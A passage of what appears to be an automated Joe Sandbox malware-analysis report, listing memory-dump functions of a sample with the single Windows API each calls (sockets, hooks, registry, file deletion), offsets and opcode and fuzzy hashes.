Instruction ID: 41bf06f528f424f1af0634556ad6b302fc2caa40f38dc9184e4d1dc963d0582e
Opcode Fuzzy Hash: 30898e0296644f726f49e75de0b69b9bf0e527a5589d8eea0630db5a60b6e8a4
Instruction Fuzzy Hash: DF11B1796002009FEB20CF56DC85FAAB7ECEF44320F08846AE945CB651D374E948CBB1

Function 05930AF6 Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32(00000000), ref: 05930B6A

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: bad4de2bde41cc01ed049c3d060deb15ca7c1e5aa7d0ab7d2c402961a6f66515
Instruction ID: 7f2c76fe35e55a29497bb0413f7ee596e200697e103035efdab4118328e06451
Opcode Fuzzy Hash: bad4de2bde41cc01ed049c3d060deb15ca7c1e5aa7d0ab7d2c402961a6f66515
Instruction Fuzzy Hash: B021A171500204AFEB21CF56CD45FA6FBECEF08328F04845DE9458BA51D375E549CBA2

Function 0593043E Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 059304AA

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: bc2993cb565d56333d74d5a77d902427fb17af278f0186da9ec0c56a16e68ef7
Instruction ID: 126ad3b0323d566f32defd51d4db296028cb3690ed7332d5ecbf8c332f3c6553
Opcode Fuzzy Hash: bc2993cb565d56333d74d5a77d902427fb17af278f0186da9ec0c56a16e68ef7
Instruction Fuzzy Hash: D821A171500200AFEB21CF55DD49FA6FBE8FF08324F04885EE9468AA52D375E519CBB2

Function 00CBA73E Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000E24,?,?), ref: 00CBA7BD

Memory Dump Source

Source File: 00000004.00000002.3074534296.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cba000_bbb.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: e55f42fe1c03ffe944aa4f41e065d47ff31436742739a29f7b515f003f5ca8c0
Instruction ID: fe187b744812ce4778ceb8e8294437b9c4c65413ebaf2830f60104c00ac8b33c
Opcode Fuzzy Hash: e55f42fe1c03ffe944aa4f41e065d47ff31436742739a29f7b515f003f5ca8c0
Instruction Fuzzy Hash: 891129715043406FD3118B15DC41F72BFB8FF86624F05809AEC4897A43D235B919C7B2

Function 059316EA Relevance: 1.6, APIs: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenCurrentUser.KERNELBASE(?,00000E24), ref: 0593174D

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: CurrentOpenUser
String ID:
API String ID: 1571386571-0
Opcode ID: b9fb1ac363c8b7d5922b9ad6e3da5b023f44b3799bc2b6fb918d0fd30670e4d2
Instruction ID: a9ebd5bb59807a98f33a35b1de4c029922ef2726078e7091c4057dcf8b9bd06f
Opcode Fuzzy Hash: b9fb1ac363c8b7d5922b9ad6e3da5b023f44b3799bc2b6fb918d0fd30670e4d2
Instruction Fuzzy Hash: 5711E675500204AEE721DF15DD45FBAFBACEF04324F08885AED458B652D374E54DCAB1

Function 05935F3D Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 05935FB9

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: 9df24895813ce87c1a2127fa045c26affa5b9311df9733e8edf5c294554b83f0
Instruction ID: 9b63d2caf4ae997aa9553c36a234be9ecd1f5ee954f9ca5e26def4d681db67be
Opcode Fuzzy Hash: 9df24895813ce87c1a2127fa045c26affa5b9311df9733e8edf5c294554b83f0
Instruction Fuzzy Hash: AF2193B55083809FD7228B15DC45B62FFF8FF4A214F09808AED85CB253D265E909CB72

Function 0593075A Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 059307CC

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 27440dc3086f6391d7a758cdce31b0e59678258eef31fe826e09f0b99688574e
Instruction ID: 68c279e7ad547c1d8939841c842184f0cbe083ab4b2113ac834096dfdabf8042
Opcode Fuzzy Hash: 27440dc3086f6391d7a758cdce31b0e59678258eef31fe826e09f0b99688574e
Instruction Fuzzy Hash: 9E117F76500600AFE721CE16CC89FA6BBECEF04620F08845AE9468A652D364E449CAB1

Function 059318EE Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegNotifyChangeKeyValue.KERNEL32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 05931958

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: ChangeNotifyValue
String ID:
API String ID: 3933585183-0
Opcode ID: 2385fede56cbafc334da1c24966acdd659cdc131955af04e9cfb9ed53896de78
Instruction ID: 2eefc4898b0382e44a2dc118e1ba88605e6a8295e79edd6e63e9dfcb629fe077
Opcode Fuzzy Hash: 2385fede56cbafc334da1c24966acdd659cdc131955af04e9cfb9ed53896de78
Instruction Fuzzy Hash: 8A11AF75500204EEEB21CF51DD45FAAB7ACEF08324F04885AE9459BA52E334E548CBB1

Function 05935A65 Relevance: 1.6, APIs: 1, Instructions: 65windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 05935ADD

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 685ba1649272676f1a1ca3f689b77ce976cbf888be08f69ef58856884ecd7833
Instruction ID: 7603a535167355aa9a0d5f9af8d50e971bf3727b48766d68a1b049dd3519b55d
Opcode Fuzzy Hash: 685ba1649272676f1a1ca3f689b77ce976cbf888be08f69ef58856884ecd7833
Instruction Fuzzy Hash: 5521D1765093C09FDB138F21CC44B62BFB4EF17210F0D84DEE9818B563C225A808CB21

Function 05931DC0 Relevance: 1.6, APIs: 1, Instructions: 64networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 05931E38

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: bf50d3aff4efebb2547529e81f53566419a24f99fdf6d5f760b0546b67de4037
Instruction ID: fef01266c0cdc9f6cc3a3c81f83b12df6e9847b90cd9e32e4b514cae7d728887
Opcode Fuzzy Hash: bf50d3aff4efebb2547529e81f53566419a24f99fdf6d5f760b0546b67de4037
Instruction Fuzzy Hash: AF11D375505384AFD7228B11CC45FA6FFB8EF46620F08809AE9448B692C268A948CB62

Function 0593106A Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 059310C9

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 59fb4e7da70f1a828f9b140bd3b520c536460727e437628d835db61db6f9a6fb
Instruction ID: 4e80d6026975e8a3cf700c03a58e03365371d428fe3cc599c54737e08e740ff1
Opcode Fuzzy Hash: 59fb4e7da70f1a828f9b140bd3b520c536460727e437628d835db61db6f9a6fb
Instruction Fuzzy Hash: 3D11E676500200AFEB21CF55DD45FAAFBE8EF44320F08846AE9458B651D374E448CBB1

Function 0593153A Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 0593159E

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: a0e10d68dffdd387965bfc511d169238f4117c83f932415a0dde6721a06cd380
Instruction ID: d8511c0d8e485e5c1b18bfef24a5d495693c878de08a41bf09d6c378dbb223fd
Opcode Fuzzy Hash: a0e10d68dffdd387965bfc511d169238f4117c83f932415a0dde6721a06cd380
Instruction Fuzzy Hash: 4B11E2B6500204AFE721CB55CC85FEAF7ECEF48324F08846AE9058B651D734E548CBB5

Function 059326F2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 0593274E

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: a7c11cbd4affcde25bf598307a1f37ca809b4aedb0852d517b3f331a733fa5cf
Instruction ID: 27a823f1b158268445540705dac2fd35288993cf577cc67ede805fc3a5988ece
Opcode Fuzzy Hash: a7c11cbd4affcde25bf598307a1f37ca809b4aedb0852d517b3f331a733fa5cf
Instruction Fuzzy Hash: D711B275600200AFEB21CF55DD45BAAFBE8EF44324F08846AE945CB651D374E548CBB1

Function 05933C4A Relevance: 1.6, APIs: 1, Instructions: 63encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 05933CA6

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: deb385c4d1e267775dd6ae148824a2e8d698e4a3512aa5a371cfba612157c7bf
Instruction ID: c43df28500c156229ae3d1468734e4ca884eecd0ee2d2b9d1c1aee0795bbf974
Opcode Fuzzy Hash: deb385c4d1e267775dd6ae148824a2e8d698e4a3512aa5a371cfba612157c7bf
Instruction Fuzzy Hash: B011E275600200AFEB20CF15DC85FBAFBA8EF44320F18886AED458A651D374E408CBB1

Function 0502A679 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0502A69C

Memory Dump Source

Source File: 00000004.00000002.3131748345.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5020000_bbb.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: db3556b5dbf5cc53eadd34dbaf46ba200283a80be3d25c7dc0de31fa80dc55b7
Instruction ID: 8d4964b3fc6051102ff93aa1baabc284fd39a2143bdd6f36d74d37ff8f64a70a
Opcode Fuzzy Hash: db3556b5dbf5cc53eadd34dbaf46ba200283a80be3d25c7dc0de31fa80dc55b7
Instruction Fuzzy Hash: 81210A70E4062ADFDB65DF24C988BAEB7B2AF44301F1184E5D409AB211CB79AEC5CF40

Function 00CBA2AE Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,4D31662F,00000000,?,?,?,?,?,?,?,?,6C9F3C58), ref: 00CBA30C

Memory Dump Source

Source File: 00000004.00000002.3074534296.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cba000_bbb.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: ac529075931f107589053a77a120b3d505a77d184b71a6c0ed6fc26843d318dc
Instruction ID: 42ccc7e0f19ee95b7a60ac48b0af2fc080a2b3aabd70da7b4836ca01fde80d38
Opcode Fuzzy Hash: ac529075931f107589053a77a120b3d505a77d184b71a6c0ed6fc26843d318dc
Instruction Fuzzy Hash: D5113A7440E3C09FD7238B259C54A62BFB49F47220F0980DBED848F1A3D269A848CB72

Function 05932F62 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

TerminateProcess.KERNEL32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 05932FB8

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 57975c7f9c77353dad4b9df7394a61906014d99534caa06701235edf378258aa
Instruction ID: 76c78d614edcdb2038ce323d6b0b82ac3e07e75ecb4dd1cfa915be7fbfd15b04
Opcode Fuzzy Hash: 57975c7f9c77353dad4b9df7394a61906014d99534caa06701235edf378258aa
Instruction Fuzzy Hash: 2611E375600200AFEB20CB15DC85BAAFBDCEF44324F08846AED05CB641D774E548CBB1

Function 05932CF2 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05932D66

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c1322d976409baf6afc86d977ea772f257cf8ebb2c33c39b27d84bc7bbffe162
Instruction ID: 9b817a91a1af28014e96eebb342ff5c482cdaff0fbf7f83be04f2bcb3feb3d2f
Opcode Fuzzy Hash: c1322d976409baf6afc86d977ea772f257cf8ebb2c33c39b27d84bc7bbffe162
Instruction Fuzzy Hash: 91218E35448780AFDB228F65DC45B52FFF4EF4A320F0888DEED858B562D275A418CB62

Function 0593441A Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNEL32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 05934470

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: 57975c7f9c77353dad4b9df7394a61906014d99534caa06701235edf378258aa
Instruction ID: 446889b5940a1386bb1eb5d0c0fcf104348319ee1e510f0daaded6a594e072d4
Opcode Fuzzy Hash: 57975c7f9c77353dad4b9df7394a61906014d99534caa06701235edf378258aa
Instruction Fuzzy Hash: 6911E7756002009FEB11CF15DD49BAAB7DCEF45324F08846AED45DB641E378E5488BB5

Function 0593563C Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,?), ref: 059356A7

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: a377c94ba756edba849ae57419c01b289a0d797e9442a9a87bccdc5095041996
Instruction ID: a7a6bc13b28f5c302aa4103d04420e9667801264fb32f36fcf75e9d9bc7f2533
Opcode Fuzzy Hash: a377c94ba756edba849ae57419c01b289a0d797e9442a9a87bccdc5095041996
Instruction Fuzzy Hash: A01181755083849FD7228F25DC55A62BFF8EF46220F0984EAED858F262D265A808CB61

Function 05930102 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 05930161

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: ff758797d73473431b2f6eb35f22ee731c9641d203339069c36a7d79413d2e1f
Instruction ID: c861ead0f2e49942357c23b6e10bc2686c9c37ed106918a11fc5d3ab6c170708
Opcode Fuzzy Hash: ff758797d73473431b2f6eb35f22ee731c9641d203339069c36a7d79413d2e1f
Instruction Fuzzy Hash: 3411E775500200EFEB21CF55DD45FAAFBE8EF44724F08885AE9458BA51C374E548CBB1

Function 05934120 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,4D31662F,00000000,?,?,?,?,?,?,?,?,6C9F3C58), ref: 0593417C

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 285a36e6507d25175c27f6dcfc965f4dd6f3806bfa3a1a02d770ff3350ddd4ac
Instruction ID: b7e978383857b3a9a00af1ddc041bebaa3c940f1f21d85924e154b769110cb9b
Opcode Fuzzy Hash: 285a36e6507d25175c27f6dcfc965f4dd6f3806bfa3a1a02d770ff3350ddd4ac
Instruction Fuzzy Hash: 0F11B2715097809FDB12CF25DC95B52BFE8EF56220F0884EAED49CF252D274E808CB62

Function 05933D32 Relevance: 1.6, APIs: 1, Instructions: 59encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 05933D8E

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: 9508638787feab4b71db7efeb4e148944e68485c670e71061dc3bbc6d7811b5d
Instruction ID: 9f68c256aad148e441d983fecd81abada72426386298405d1d4070a47bd0f4c5
Opcode Fuzzy Hash: 9508638787feab4b71db7efeb4e148944e68485c670e71061dc3bbc6d7811b5d
Instruction Fuzzy Hash: D911CE75500200AFEB21CF55DD85FAAFBA8EF44324F08885AED458AA42D374E508CBB2

Function 059365FA Relevance: 1.6, APIs: 1, Instructions: 58networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 05936653

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: a43ea1454467c65f28e919dafa9706c5fd0e945c5d53902cc788d1dd922a2c42
Instruction ID: 3fa0cbb33dd30db9ceae8012d162ffa70efdeae51929b3b4fd3fb94c60afd284
Opcode Fuzzy Hash: a43ea1454467c65f28e919dafa9706c5fd0e945c5d53902cc788d1dd922a2c42
Instruction Fuzzy Hash: 4211C175500200AEEB21CF55DD45FA6BBACEF44324F08846AE9048B642C374E5088BB5

Function 059354ED Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 05935558

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 2bb035d65d719bbbcd8ef2ecb7c28d99a22895b148bc8f15335edfcc0bdc1cc9
Instruction ID: 0c6bdf10f3aa72d17645fd6597f748c6b5de091bef3ef0c7f51ba5de3666ecd7
Opcode Fuzzy Hash: 2bb035d65d719bbbcd8ef2ecb7c28d99a22895b148bc8f15335edfcc0bdc1cc9
Instruction Fuzzy Hash: BC1181754093C09FD7138B25DC44B61BFB4EF47624F0980DEDD854F263D2656808CB62

Function 0593127E Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 059312D7

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: a43ea1454467c65f28e919dafa9706c5fd0e945c5d53902cc788d1dd922a2c42
Instruction ID: 2f4c8495702123f521836586bac26df066c07d886813b1f51ba36cc6d630da23
Opcode Fuzzy Hash: a43ea1454467c65f28e919dafa9706c5fd0e945c5d53902cc788d1dd922a2c42
Instruction Fuzzy Hash: DA11E075900200AFEB21CF55CC85FAAFBA8EF44324F08846AE9459BA56C374E508CBB5

Function 0502A670 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0502A69C

Memory Dump Source

Source File: 00000004.00000002.3131748345.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5020000_bbb.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ba03cd31b6f4b6e3cac8b7ee9d70d422826d1ab0a6158f9c2682ed043a877916
Instruction ID: d0e604f67d796781f62b13a15091c1044fc773396cc3a917052d03f3ae504a13
Opcode Fuzzy Hash: ba03cd31b6f4b6e3cac8b7ee9d70d422826d1ab0a6158f9c2682ed043a877916
Instruction Fuzzy Hash: DD21EA70E4162ADFDB65CF10D948BAEBBB2BF44301F1184E5D409AB251CBB9AAC5CF40

Function 05930EA2 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 05930EF8

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: shutdown
String ID:
API String ID: 2510479042-0
Opcode ID: a9719fe61be02fa6a29238105597a5918b914f229b8d493e2df854447a47f9ab
Instruction ID: da1c3f3accd08cbf10dfb31208fd6e2779c7a558f264f7e128e28b3706fc6aa9
Opcode Fuzzy Hash: a9719fe61be02fa6a29238105597a5918b914f229b8d493e2df854447a47f9ab
Instruction Fuzzy Hash: A811C275500204AEEB21CF15DD89BAABBACEF44324F08849AED449BA42D374E548CBB5

Function 00CBB452 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000E24), ref: 00CBB4BB

Memory Dump Source

Source File: 00000004.00000002.3074534296.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cba000_bbb.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a98c1148fe3ebadf09c98ff349ea3693f54655f797298e653a95bd6221de3854
Instruction ID: b9a0db8841f3c16367fdf51271f6412bc1372cadc74cf63a6c693fbdcae90c7a
Opcode Fuzzy Hash: a98c1148fe3ebadf09c98ff349ea3693f54655f797298e653a95bd6221de3854
Instruction Fuzzy Hash: F111E575500200AEE7308B16DD85BE6FBA8EF14724F14C059FE045A782D3B4E94DCBA5

Function 059341C3 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 05934231

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: b418cf7c1bbeb6ecee39dbc7371056998e4344483cdc92e51eebf23407e00d79
Instruction ID: abc84a5bb7e72e6b8bad69f50945ea3ed0c86e0ed482f881796685f360712218
Opcode Fuzzy Hash: b418cf7c1bbeb6ecee39dbc7371056998e4344483cdc92e51eebf23407e00d79
Instruction Fuzzy Hash: D51190754097809FDB228B15DC45F62FFB4EF46314F0984CAE9844B5A3D275A908CB62

Function 05935888 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,?,?,?), ref: 059358F5

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: ee96de36d4e05be301c9d9cbd6265b66ca789d967b4dd123277c824f060303b1
Instruction ID: 7cdd94fc7564cb922ea75f82cdd534f392e7572ca21d4bb564aa3600497ac183
Opcode Fuzzy Hash: ee96de36d4e05be301c9d9cbd6265b66ca789d967b4dd123277c824f060303b1
Instruction Fuzzy Hash: AA11AF714083C09FDB228F21C854A62FFF4EF06220F0C80CAEDC44B563D265A818DB62

Function 0593225A Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 059322B9

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: e9f7631e5d3232f29291b990aaae2aeebfeda2b05b31d6ba43a5d3e906c8a6e4
Instruction ID: ccb6954c0a0334302fd4dba4fbc19aadb5f3d34f24c1f31a893855b326c94c08
Opcode Fuzzy Hash: e9f7631e5d3232f29291b990aaae2aeebfeda2b05b31d6ba43a5d3e906c8a6e4
Instruction Fuzzy Hash: 4F11E579500200EFEB218F41DD45FAAFBE8EF15724F08845AED454BA52D374E449CBB6

Function 05933ECE Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

select.WS2_32(?,?,?,?,?), ref: 05933F24

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: select
String ID:
API String ID: 1274211008-0
Opcode ID: b92ce988b0bff02148ed75914da8be7a2855373d6cefc54ccb8c5da3e7d26691
Instruction ID: 3f69a3fac7baccc90146755e08115acaf558c00688944d52cf18b799174ec9e0
